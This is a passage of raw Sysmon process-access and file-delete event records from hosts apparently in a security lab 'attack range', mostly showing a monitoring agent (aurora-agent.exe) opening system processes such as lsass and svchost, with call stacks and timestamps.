Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015458Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.715{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015457Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.714{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015456Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.711{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015455Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.709{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015454Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.704{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015453Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.700{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015452Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.700{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015451Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.692{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015450Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.690{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015449Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.683{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015448Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.682{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015447Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.656{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015446Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.649{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015445Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.637{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015444Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.627{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015443Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.613{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000015442Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.581{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B50F7AE239814BDC848C017D40C419,SHA256=89005F68A474B7906B82084AA8A1E6C4950F189DF0B2452FE4652CCBAB70CE52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015441Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.574{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015440Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.565{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000015439Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.556{E5A8D418-DC44-63C7-1C00-00000000B002}20203480C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019414190) 10341000x800000000000000015438Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.546{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015437Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.544{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015436Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.542{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015435Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.539{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015434Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:22.537{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000040468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.633{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.633{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.633{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E38C-63C7-0906-00000000AF02}2520C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.399{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.399{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:22.399{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files 